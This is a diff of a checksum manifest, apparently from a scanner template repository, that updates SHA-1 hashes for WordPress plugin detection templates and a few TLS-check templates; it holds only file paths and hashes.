+http/technologies/wordpress/plugins/happy-elementor-addons.yaml:a156496d7c3273674d39d1fcec6e8e247f70ebe9
 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1b17cd6fbfb1b2b4610c8bebd52a32d56ccb5913
-http/technologies/wordpress/plugins/header-footer-code-manager.yaml:5128e3b8cf1661f485ad21c7919f0e3b118811c7
-http/technologies/wordpress/plugins/header-footer-elementor.yaml:b72e043c8ac73e657994809ad4f824b2d1e38b90
-http/technologies/wordpress/plugins/header-footer.yaml:0582524d74da4506668592a3a21e747a73fc1078
-http/technologies/wordpress/plugins/health-check.yaml:671ca5cc6adfb1f487c5d5ad4f4bd3521899a0cb
-http/technologies/wordpress/plugins/hello-dolly.yaml:b1c31c3a503392b0893412df0bfd67f66a08e994
-http/technologies/wordpress/plugins/host-webfonts-local.yaml:431161cea9f7a563b18dd25f97cb35d8b35c1a9c
-http/technologies/wordpress/plugins/imagify.yaml:43558db808bad1013f688374781f0496b0979f47
-http/technologies/wordpress/plugins/imsanity.yaml:eb23f855f666226a39bcd0c5e62bda222d670d43
-http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:15e3a0fe4e9d3c8b684ed81d7c38d8f5963cc7d5
-http/technologies/wordpress/plugins/instagram-feed.yaml:638a2ea1ff92407b33293b19f81421f64dcbbef2
-http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:8c5eb0b2685635bbcc3c4e86f0101c683f772d3b
-http/technologies/wordpress/plugins/iwp-client.yaml:fdaace58d40935a6339104a99da4b9ff24b8f952
-http/technologies/wordpress/plugins/jetpack-boost.yaml:74eb899976e975822bc9083ea905466b752a6e65
-http/technologies/wordpress/plugins/jetpack.yaml:3bf5877fc44fa89f5f53dffd5d892e728223dd2e
-http/technologies/wordpress/plugins/kadence-blocks.yaml:49b7614a27b836a156bf9a0c437a61bd15c15f0c
-http/technologies/wordpress/plugins/kirki.yaml:ec2d3988189b72a91fda93ec951c89cea6d59ff9
-http/technologies/wordpress/plugins/leadin.yaml:cebb0c9f50604dbe0b5eba4a3562f361a57fffa9
-http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:fe1c531f813efce95c8465c0759e9d575ba2f8e9
-http/technologies/wordpress/plugins/limit-login-attempts.yaml:043593ddb5ba2ff26c9510d7a55d3281dbd26787
-http/technologies/wordpress/plugins/litespeed-cache.yaml:6007e19469fab7ddca44c19c461f53db8ad8d764
-http/technologies/wordpress/plugins/loco-translate.yaml:7753ed7a950fe3a2d63c8543c6cf817601e40c93
-http/technologies/wordpress/plugins/loginizer.yaml:b2311b9ed6e775374db2f7572c164dadc9c7230b
+http/technologies/wordpress/plugins/header-footer-code-manager.yaml:8474198d250ca4bdc0ab5c12cf23a9b51fd06372
+http/technologies/wordpress/plugins/header-footer-elementor.yaml:b0587c2319227b07a3d692aaa7c257888be39765
+http/technologies/wordpress/plugins/header-footer.yaml:df3106a1b40b9c5568e26e4b607dbd0d4da769e2
+http/technologies/wordpress/plugins/health-check.yaml:dbf87bd510108d015a180d3fbc03d45481974f23
+http/technologies/wordpress/plugins/hello-dolly.yaml:7b7773fcf3893f955e07987ab3d466472e47fdd7
+http/technologies/wordpress/plugins/host-webfonts-local.yaml:acf3cb5d65df4d20d1cb4519f1cce6d463570317
+http/technologies/wordpress/plugins/imagify.yaml:07d8654f8cfc0bc3fac475b458b6f8b13ff29461
+http/technologies/wordpress/plugins/imsanity.yaml:d5a2c4b44c29eda5354bbc3339421a248342f5e4
+http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:29df4caa3ec72e270a5b680cc6dba22aa42f7b30
+http/technologies/wordpress/plugins/instagram-feed.yaml:f4867c229ee945f162265d86e1e20f9e908f32da
+http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:4f680679454744ffce822ef8103f9e502945cc5b
+http/technologies/wordpress/plugins/iwp-client.yaml:d439a22263fa52c4f97b1ddbf87db0463426d40f
+http/technologies/wordpress/plugins/jetpack-boost.yaml:5344e84ef6d9c77864a3b4b68bfe1d966436d391
+http/technologies/wordpress/plugins/jetpack.yaml:bf3f2dc921b1ed41c10ceec1ddf4dc25f1b53cde
+http/technologies/wordpress/plugins/kadence-blocks.yaml:16f4dd00133170c2d369e444dfcc3d37ff77d43a
+http/technologies/wordpress/plugins/kirki.yaml:c97031d4389c1390ccf770aa86ab3b3fa35f1dac
+http/technologies/wordpress/plugins/leadin.yaml:459b7e97592be0f092c2b3b49de24d496bc02fcc
+http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:24602fdc3551beca9567c9610cd9d3b4fee0f7b3
+http/technologies/wordpress/plugins/limit-login-attempts.yaml:7f83455afdb4b27fb6b3db7237206de3a6cb7046
+http/technologies/wordpress/plugins/litespeed-cache.yaml:80d84515b9a1ce2d934ae05e2f5a88f18e0ca5a8
+http/technologies/wordpress/plugins/loco-translate.yaml:6e88f4e9ef7197d8de502fd14f47f79b4b46911b
+http/technologies/wordpress/plugins/loginizer.yaml:fd0116df11b6730957c17fea8fcc5ce1a7df96c0
 http/technologies/wordpress/plugins/loginpress.yaml:318058c81cfee1d55915a2fbf2ac027d7462b50c
-http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:7da9f4925b1be42ce0552ca95bec9111ae393c0d
-http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:64765191d6483e9d82f92d1051c8f02648c6b0ea
-http/technologies/wordpress/plugins/mailpoet.yaml:0b8eb1db41ea1e6c1f3fc72d2b824c596fb1f87d
-http/technologies/wordpress/plugins/maintenance.yaml:3705f256a8030b1cfef05f967a22fa510e815abd
-http/technologies/wordpress/plugins/mainwp-child.yaml:a2a47023bc2dcf43f32dd680bb6f59b05182696f
-http/technologies/wordpress/plugins/malcare-security.yaml:3bd2212a9b0b433f8312b48206cf8d212232e919
-http/technologies/wordpress/plugins/megamenu.yaml:ab4f78f2d5e298081cfbb7a118da4e8d5b585251
-http/technologies/wordpress/plugins/members.yaml:20382c460b37c9547478b41ba0bd18969085043e
-http/technologies/wordpress/plugins/meta-box.yaml:a64bddea6cebdaa58c582704dfc6114d87db33d6
-http/technologies/wordpress/plugins/ml-slider.yaml:0b55d89bf2436fbf542a3cbc63a71826e24b7b50
-http/technologies/wordpress/plugins/newsletter.yaml:4939f22ce593ace75fad975661d91a09ddcd71e9
-http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:a3e9c29fbf8c1b8361d5058abc29ff87af6af78c
-http/technologies/wordpress/plugins/nextgen-gallery.yaml:6d554cf38999c4f2268ef7595a54f1994f58c74f
-http/technologies/wordpress/plugins/ninja-forms.yaml:8f67811676ecfb7f1d6bda1b2a347da35bc382f6
-http/technologies/wordpress/plugins/ocean-extra.yaml:d863b883d93ad5144cc03f5053c5731ef8123c11
-http/technologies/wordpress/plugins/official-facebook-pixel.yaml:191b4beb5fdb155022dabcb0e5b3d2dc182039e0
-http/technologies/wordpress/plugins/one-click-demo-import.yaml:ef52c5c58cface8a29dd3ab7c334c054c77d9ed8
-http/technologies/wordpress/plugins/optinmonster.yaml:f37b2eba6f4e268a9460e9739d8d5baad525be70
-http/technologies/wordpress/plugins/otter-blocks.yaml:c907909dff50fd5a204cc3b85224965c2a3758b7
-http/technologies/wordpress/plugins/password-protected.yaml:80067d56544816232306fefe26d8a3c1b031d7d1
-http/technologies/wordpress/plugins/pdf-embedder.yaml:36c7b3808215b738e6485e61e2d86d2f56784d12
+http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:d96413ced20b451ef657a655f3ba333575a1b2e3
+http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:d166e9194d9700180585945fa717b01849fb0519
+http/technologies/wordpress/plugins/mailpoet.yaml:28a36b2dbcef7a1e49f30ff165907da3576693b4
+http/technologies/wordpress/plugins/maintenance.yaml:46343810ab17d627079432942446302dca630eeb
+http/technologies/wordpress/plugins/mainwp-child.yaml:1a90cfff9eaeab8c397b5269876f7b469cfff7b4
+http/technologies/wordpress/plugins/malcare-security.yaml:20cae47466ca8201c6fbfd58324fe1bc90db9623
+http/technologies/wordpress/plugins/megamenu.yaml:dcdca3e0704e25dcc813c121039640b907274fcd
+http/technologies/wordpress/plugins/members.yaml:2e78a795ed43f766f8bfd3bb528fd0ff2f0fddfb
+http/technologies/wordpress/plugins/meta-box.yaml:529232e3db137e3bac4eddcee8768ec4c34e7510
+http/technologies/wordpress/plugins/ml-slider.yaml:7c2b57d5255ea5e2cc0ee747502fb24949f46015
+http/technologies/wordpress/plugins/newsletter.yaml:12033cfd493029024d58d9ff46d4d4a8d0a1c3d9
+http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:21d9b6618fa59927c3833821306bd42ec7c89d29
+http/technologies/wordpress/plugins/nextgen-gallery.yaml:6cabf694d018ce86f802bdac15b8f18c05c373bf
+http/technologies/wordpress/plugins/ninja-forms.yaml:346bd7fe3cd6070a50760d1094b93dca734947c8
+http/technologies/wordpress/plugins/ocean-extra.yaml:42bf83b1af5749122b0405343ba20331e27e02f5
+http/technologies/wordpress/plugins/official-facebook-pixel.yaml:ff48ca47c1758494b8faf44a9e8d82c0d0545fa4
+http/technologies/wordpress/plugins/one-click-demo-import.yaml:2859e55dd6c58174f198bb2661309cb20b9bc159
+http/technologies/wordpress/plugins/optinmonster.yaml:ad36d7e2024e606ed95427ae8fddbddcbb5be5af
+http/technologies/wordpress/plugins/otter-blocks.yaml:a78a532c8c365f7d5389a154c72ffab4a9e198f9
+http/technologies/wordpress/plugins/password-protected.yaml:6878b6ec0edd97837a248d2082b59b73a5c0bd68
+http/technologies/wordpress/plugins/pdf-embedder.yaml:b81ffb6ceaacadea709eba4d896f253a3798ae18
 http/technologies/wordpress/plugins/photo-gallery.yaml:a2d49608d9cfa92c7ff2fec2e8d158bbfd1f72dd
 http/technologies/wordpress/plugins/php-compatibility-checker.yaml:528a6a29383907a8488737d2302a6a1a2d929553
-http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:988028ed95ba98427e7659a9ee664c6571e615d5
-http/technologies/wordpress/plugins/pixelyoursite.yaml:f96bdcba1c915994880c8612dc3b10feed1d8d3f
-http/technologies/wordpress/plugins/polylang.yaml:38390b89bea14384c59ee3d787c3d2a5ef396e83
-http/technologies/wordpress/plugins/popup-builder.yaml:76dbd191f39696f62ac0be9b7e0a7619c300fc9a
-http/technologies/wordpress/plugins/popup-maker.yaml:9898f98e8817a0a6eca29a652c9aa671ef897aaa
-http/technologies/wordpress/plugins/post-smtp.yaml:fb3913d039e39bdfa909850be96a436c2daed0da
-http/technologies/wordpress/plugins/post-types-order.yaml:c140e8206ede576928c853247b1139a9e1306bf2
-http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:4c1a2a5ced317ec9fe1105d2171ce6d3b35c2bd4
-http/technologies/wordpress/plugins/pretty-link.yaml:f52eb94a236e0e95b8db45877a65ace2dd7d2b39
-http/technologies/wordpress/plugins/really-simple-captcha.yaml:4c8c8b459ea6a2452d1dddd9910b668e42fe3ab4
-http/technologies/wordpress/plugins/really-simple-ssl.yaml:c8f30313d72e2d2a6315fc30a8331f2eb9aa41ad
-http/technologies/wordpress/plugins/redirection.yaml:78dbf29316c6ac3aa23678bd4aed69a5ddd42175
-http/technologies/wordpress/plugins/redux-framework.yaml:0f9712d7e86d87aff431070568cf1ea7cb5198e5
-http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:8a4d0748905dc0457e96269db56428c7b2479864
-http/technologies/wordpress/plugins/safe-svg.yaml:2103b4bcb3c3e97d3a601618d4adf277da860845
-http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3abc289406b03c9a1a9a9c3a61f01adca40f3490
-http/technologies/wordpress/plugins/sg-cachepress.yaml:cc889ada7c90d40cc71b72a0d9fc976cacfa3e85
-http/technologies/wordpress/plugins/sg-security.yaml:0ab396fbd10115bbd286e7c229ac887e727390b1
-http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:22cf98912edc91bf3425771d400c10f6e39a0e92
-http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:a15a92c4687e1f7bc6aab1849561ebc8a6522a7d
-http/technologies/wordpress/plugins/simple-custom-post-order.yaml:86f6b3755978c76efc238361006fba469776da59
+http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:c32339accaeaeac78ec9c14a8092e538a37cae47
+http/technologies/wordpress/plugins/pixelyoursite.yaml:b3da054b040050de221d3f85ad1e51d4f109472c
+http/technologies/wordpress/plugins/polylang.yaml:fe96dc52452a9589f615f5c50a2a2d566408d24d
+http/technologies/wordpress/plugins/popup-builder.yaml:b4c33fcfffe3b96d16f7e7c55a76a57223cfd988
+http/technologies/wordpress/plugins/popup-maker.yaml:e01af93b67f33cd260b458408dc505a8209b629e
+http/technologies/wordpress/plugins/post-smtp.yaml:5b34a59d80a1257b18e38bf29177aa83b238f6b2
+http/technologies/wordpress/plugins/post-types-order.yaml:8db67ac7ec324b3d4800afe95f2c5b479fe0af82
+http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:ac0ee352c996bbeefc1d359b6147caf570f918f4
+http/technologies/wordpress/plugins/pretty-link.yaml:62549cdff64a91d536835fa1fea43109f0561156
+http/technologies/wordpress/plugins/really-simple-captcha.yaml:435b8299f4b4b830f584ef2738d5ec570d709eb4
+http/technologies/wordpress/plugins/really-simple-ssl.yaml:8c3f228a961065c0ffc6ae288e522af0267ad147
+http/technologies/wordpress/plugins/redirection.yaml:d23e77de89ba863def13db88a8b6344d31b0ba19
+http/technologies/wordpress/plugins/redux-framework.yaml:45d721b643a269e7a6837b9a5d1d5fb22e29853b
+http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:0d6a705e8fcae72c35d8d4b3ed8aa7f79980e8d8
+http/technologies/wordpress/plugins/safe-svg.yaml:a6a21aaef82c40ca2bcb59ce2e61718dd0e6af55
+http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3e08b5bdb1f3ec58dd08c620b7a9acc728913efd
+http/technologies/wordpress/plugins/sg-cachepress.yaml:8e1eabb506c0b746de758852d2b8980766a0b94c
+http/technologies/wordpress/plugins/sg-security.yaml:9052be594f4d2bffac320adf7b1a019f797528a5
+http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:2529031f99ea27c92a54d847c15d77480847fdd7
+http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:d0ef637d9661f51b92339cabe9e3241c8ea9d6c6
+http/technologies/wordpress/plugins/simple-custom-post-order.yaml:e8069c056b1dcc1dfbbc6ff7a561b9e4c76bc28a
 http/technologies/wordpress/plugins/simple-page-ordering.yaml:5ca11a9af02a43514837bfae1a4b1e0271674751
-http/technologies/wordpress/plugins/siteguard.yaml:04beb993d2d664061085bd60104bcf086ee5f492
-http/technologies/wordpress/plugins/siteorigin-panels.yaml:a8b2262d950dd95e64f0f4d048fc4a6988853d81
-http/technologies/wordpress/plugins/smart-slider-3.yaml:bde8a44b6a8bfe6ce5208bbfc5fef9116b65c350
-http/technologies/wordpress/plugins/so-widgets-bundle.yaml:243974a21f98da84c266affec329cc4d1f9596da
+http/technologies/wordpress/plugins/siteguard.yaml:e4a47780641caa5fc7b28702a8619544f10ad1d2
+http/technologies/wordpress/plugins/siteorigin-panels.yaml:581d45daed9aa4def46869c8dc9770508824abfd
+http/technologies/wordpress/plugins/smart-slider-3.yaml:cd1b9cefc186446cdd9209cdd5c456dbcbb42730
+http/technologies/wordpress/plugins/so-widgets-bundle.yaml:f7e37fa2f502dd7c949c0bf8b43dec56315cc35c
 http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:c9da76f5a8dab4cb65e35e49aebd0300fe20c1a8
-http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:404d69b6a6b8e3f3e450b281f6e7f03f409a0f3f
-http/technologies/wordpress/plugins/sucuri-scanner.yaml:fee0a5d0516d042c28c9468ef8fb5d5e38ce26c6
-http/technologies/wordpress/plugins/svg-support.yaml:1937f2cbd2738469bf2bd738d98dde3f67e03fb1
-http/technologies/wordpress/plugins/table-of-contents-plus.yaml:63994d3a1e4a5b0122388621d2ef614a2eb37faa
-http/technologies/wordpress/plugins/tablepress.yaml:b9d728ac847c6d44006d896e5cd3df57e4004f08
-http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:b3cd6a705aa73c6a09557b7cebc1d14097e4b1f2
-http/technologies/wordpress/plugins/the-events-calendar.yaml:60035e7a44045476cba892f90e28f535168ca338
-http/technologies/wordpress/plugins/themeisle-companion.yaml:308725e3df3f6646f7b024131e4787deca30e357
-http/technologies/wordpress/plugins/tinymce-advanced.yaml:41f70c014363a9631cc63ff331f6fa4a55f7c903
-http/technologies/wordpress/plugins/translatepress-multilingual.yaml:54ca06f59600b8ff150a29ce4db9df67be689237
-http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:007bc1a439e5ad52d345d0b21f6f92bbf8e48aa4
-http/technologies/wordpress/plugins/under-construction-page.yaml:006b99ffb995bb30292666cd1d26a6433d95d495
+http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:d3b0d6984b6149fc9c376c67f4427c286a42c4d1
+http/technologies/wordpress/plugins/sucuri-scanner.yaml:de8bfb0cfbd640fc53b8eeeda80fbdf787b66b69
+http/technologies/wordpress/plugins/svg-support.yaml:352c1dd32804e85f4df4b22834ca0e797a2aad60
+http/technologies/wordpress/plugins/table-of-contents-plus.yaml:eb076e2a3b271ec1744b1b244cedc859b97b2dcc
+http/technologies/wordpress/plugins/tablepress.yaml:c3594421fecfa1311ccd792b99201de358316284
+http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:686b9870e43a0eb740d247fb83a567700577df9b
+http/technologies/wordpress/plugins/the-events-calendar.yaml:d1c59cba049e515abed8ca65950cd156cb84c928
+http/technologies/wordpress/plugins/themeisle-companion.yaml:680ce8f2109280e4684d527b0cda47fd480711a4
+http/technologies/wordpress/plugins/tinymce-advanced.yaml:89c4aa06eb4911cfa3b826a3d8203bf605610f1a
+http/technologies/wordpress/plugins/translatepress-multilingual.yaml:7e6c3b01800f88b4ff69e32cadfb3281e73b9390
+http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:6ddb9cd781f24984eb82258381b8fafd1dee8a2a
+http/technologies/wordpress/plugins/under-construction-page.yaml:d4c9887eca48da58b42bdcad120c493e4b916e35
 http/technologies/wordpress/plugins/unyson.yaml:51e3ce4490086550b60f59a3f2f7e401001db1ea
-http/technologies/wordpress/plugins/updraftplus.yaml:67b8ef043332480e6cc21270e92a83846dfef37f
-http/technologies/wordpress/plugins/use-any-font.yaml:4839586b85559db12191032b7fe4154b683a25bd
-http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8
-http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:27cbc019dd6d9540482e167bb4a9f0c95bfbd233
-http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c
-http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521
-http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a
-http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472
-http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634
-http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839
-http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265
-http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:8e91bc3725d0de356884685dddd7736c9a637e67
-http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82
-http/technologies/wordpress/plugins/woocommerce-payments.yaml:3c8f70f3717ebb144aeecc4cf78351928e724ee4
-http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b
-http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee
-http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba
-http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40
+http/technologies/wordpress/plugins/updraftplus.yaml:0076f3c9a5ed4f2e2d2749c1b65eb23140214d7a
+http/technologies/wordpress/plugins/use-any-font.yaml:382b7daeb7b74956c8e3ee5f4c65254c65c4e487
+http/technologies/wordpress/plugins/user-role-editor.yaml:7c91ccbbd4225e3f1ad358f2a6feeb311b3f81fb
+http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:d3a9e8b173ba11ca7733ed58895d793b2824ba5e
+http/technologies/wordpress/plugins/w3-total-cache.yaml:d19a3d9cd406a2763a5d1e15391d260258f10d97
+http/technologies/wordpress/plugins/webp-converter-for-media.yaml:d438f3628f635772866af020c74bad5dfe1d0404
+http/technologies/wordpress/plugins/webp-express.yaml:28c13e642196daae49de19d38ef3e5890e9cccf8
+http/technologies/wordpress/plugins/widget-importer-exporter.yaml:a698c5c96df88e883aab70f73fe5b489a8470adc
+http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6ce9a25f844c90dc4a8a0ed085692d03e0e643ae
+http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0c20bcedf17334904bd329de1f9596cfecca9ae6
+http/technologies/wordpress/plugins/woo-variation-swatches.yaml:f4bbcbe628b62a5853af61a175bec617bb48fbe4
+http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:94e0db445fc82d755e55292d448d99a450ae723c
+http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:a0bd411538fbdd622c592fbf6c705753f3b1ca18
+http/technologies/wordpress/plugins/woocommerce-payments.yaml:9ed780c632c83cd2d948af2a01eee2ea9cdd87a5
+http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:fc7c14abefdde2e6a9b280a04e504c623f2168bf
+http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d498033186c927e965619ba1736f8dc88c2c88b1
+http/technologies/wordpress/plugins/woocommerce-services.yaml:053a38cfa9a063b0475a7ec28d1f00c85589ffb6
+http/technologies/wordpress/plugins/woocommerce.yaml:21e14ecdd9795d0b3377c8cdb370ef2408a902c4
 http/technologies/wordpress/plugins/woosidebars.yaml:49e90e83fc3185fed5f2c0392a13a991ab64601d
-http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5
-http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074
-http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68
-http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd
-http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2
-http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a
-http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3
-http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369
-http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0
-http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1
-http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962
-http/technologies/wordpress/plugins/wp-optimize.yaml:31c2935841bd67eeeb87524152bb389c823d9ded
-http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8
-http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54
-http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:ba98eba18acb3e8959037689a48560a9ce31a9f1
-http/technologies/wordpress/plugins/wp-rollback.yaml:4e307fe6f0d30b930431b040e0f478add975ad92
-http/technologies/wordpress/plugins/wp-seopress.yaml:b7fcb27f3c6d85f16295a55a48ecd693b65a51ca
-http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5
-http/technologies/wordpress/plugins/wp-smushit.yaml:d67ff121c4ac38fa566628f9966cf334348e1245
-http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1
-http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f
-http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b
-http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d
-http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50
-http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848
-http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75
-http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb
+http/technologies/wordpress/plugins/wordfence.yaml:59cf258e463fa7f76b21f3b3088b1d91a8ac44ee
+http/technologies/wordpress/plugins/wordpress-importer.yaml:3a47895288fe9d8d9ada42228022e25510544e8c
+http/technologies/wordpress/plugins/wordpress-seo.yaml:86e00ac8b21548056c7a9efbba9b66c675928457
+http/technologies/wordpress/plugins/worker.yaml:909166af340135b049385064e0cac70e3168c34f
+http/technologies/wordpress/plugins/wp-fastest-cache.yaml:8bcbdb8253bd78b63c34db17f1c754c5ebd2bd9f
+http/technologies/wordpress/plugins/wp-file-manager.yaml:cb51b1eaed5e009fa74ccad652e4590ff3613fd0
+http/technologies/wordpress/plugins/wp-google-maps.yaml:fa3a0d2461909eb76f9f4176a82719abe2a8baee
+http/technologies/wordpress/plugins/wp-mail-smtp.yaml:65d7a5942c9f22136fdf1568a47532465a0fd8e8
+http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:ba76df7ace8e17dbd081adb0beafa3d2e9a2751c
+http/technologies/wordpress/plugins/wp-migrate-db.yaml:eb5434734e59d7dac0579b08905ee11bc5ad623e
+http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:0b8258608436387a5af44bb17dc664261d84dc20
+http/technologies/wordpress/plugins/wp-optimize.yaml:b4c12386fa882d15ce98bc19736fe42f397ff7ce
+http/technologies/wordpress/plugins/wp-pagenavi.yaml:1ee64be881e3ce5eff6e61a1bf7b3878a4aa80c3
+http/technologies/wordpress/plugins/wp-reset.yaml:4aeb62db4c520ed2a1128a3931f1da1627d5504b
+http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:69b5e88af7e6e7b825f22b6f6eb34dea213dab95
+http/technologies/wordpress/plugins/wp-rollback.yaml:7a2b71c8a6a0c35005dad0fd021f4daa29209549
+http/technologies/wordpress/plugins/wp-seopress.yaml:93a821f479301582f2209a9f463b408118cfbec9
+http/technologies/wordpress/plugins/wp-sitemap-page.yaml:583c9968cc733e34f6b8b5b61a953c2d4b95e27b
+http/technologies/wordpress/plugins/wp-smushit.yaml:cd360eb2304096cd0f7ec6a67f1f6ed239320676
+http/technologies/wordpress/plugins/wp-statistics.yaml:3a7c780acc3cd312da690aa73dae8ccd151a9a90
+http/technologies/wordpress/plugins/wp-super-cache.yaml:cdb330ec2ee847335d17369905afe5b1ebb9b624
+http/technologies/wordpress/plugins/wp-user-avatar.yaml:401a4a8d3ad83bd1c23fd1be67314742cbf72468
+http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:5194cfad7904c267af9451baf7460c96d5310e02
+http/technologies/wordpress/plugins/wpcf7-redirect.yaml:66ae3a35ed37853fe298506a45469b3300e9f671
+http/technologies/wordpress/plugins/wpforms-lite.yaml:cb9b2f5385e57ef8acd020fc2acb090d2a5d7d40
+http/technologies/wordpress/plugins/wps-hide-login.yaml:791f9ccdb7e2de037094e6c41cebf6d93f50cf90
+http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:1760dbfa341c1f3dc21ad5d33393b55216735c39
 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259
-http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788
+http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a
 http/technologies/wordpress-detect.yaml:764a9e3823e31a5c778e6abb4d6065347a2005e9
 http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed
 http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69
@@ -7199,7 +7200,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed
 ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e
